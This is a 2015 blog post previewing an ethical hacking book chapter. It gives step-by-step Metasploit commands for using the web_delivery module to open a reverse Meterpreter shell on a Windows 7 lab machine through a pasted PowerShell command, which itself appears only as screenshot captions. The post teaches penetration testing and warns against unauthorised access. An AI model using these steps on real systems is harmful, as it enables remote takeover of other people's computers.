Month: November 2015

Easy Remote Shells with Web Delivery

This is a sneak peak at a section of the “Web Delivery” chapter in my new Ethical Hacking book, “Intermediate Security Testing with Kali Linux 2“. The Metasploit Web Delivery module is one of the easiest ways to quickly get a remote shell from a Linux, Mac or Windows system. In the full chapter I show how to use it against all three platforms. For the preview we will only cover Windows based targets.

As always, never try to access a network or system that you do not have express written permission to do so. Accessing systems that you don’t have permission to is illegal and you could end up in jail.

Web Delivery

In this section we will learn how to  using the Web Delivery exploit module. We will be using Metasploit and our Windows 7 VM as the target.

Let’s get started!

1. From a Kali terminal, type “msfconsole”:

Metasploit Web Delivery 1
2. Now enter:

  •  use exploit/multi/script/web_delivery
  •  set lhost [Kali IP Address]
  •  set lport 4444

3. Type, “show targets”:

Metasploit Web Delivery 2

Notice we have 3 options, Python, PHP and PSH (PowerShell). We will be attacking a Windows system, so we will use PowerShell.

4. Enter, “set target 2”
5. Set the payload, “set payload windows/meterpreter/reverse_tcp”
6. You can check that everything looks okay with “show options”:

Metasploit Web Delivery 3
7. Now type, “exploit”:

Metasploit Web Delivery 4

This starts a listener server that hosts our payload and then waits for an incoming connection. All we need to do is run the generated PowerShell command on our target system.

8. On the Windows 7 system, open a command prompt and paste in and execute the PowerShell command:

Metasploit Web Delivery 5
And after a few seconds you should see:

Metasploit Web Delivery 6

A meterpreter session open!

9. Now type, “sessions” to list the active sessions
10. Connect to it with “sessions -i 1”

Metasploit Web Delivery 7

We now have a full Meterpreter shell to the target:

Metasploit Web Delivery 8
Type “exit” to quit the active session and “exit” again to exit Metasploit.

I hope you enjoyed this chapter section preview. In the full chapter, I show how Web Delivery can be set to work against Linux and Mac systems also. In addition in the Msfvenom chapter you will also see how to make standalone executable shells that don’t require the target to open a command prompt on their system and manually run the code.

For a lot more ethical hacking training and hands on tutorials, check out “Intermediate Security Testing with Kali Linux 2” available on Amazon.com.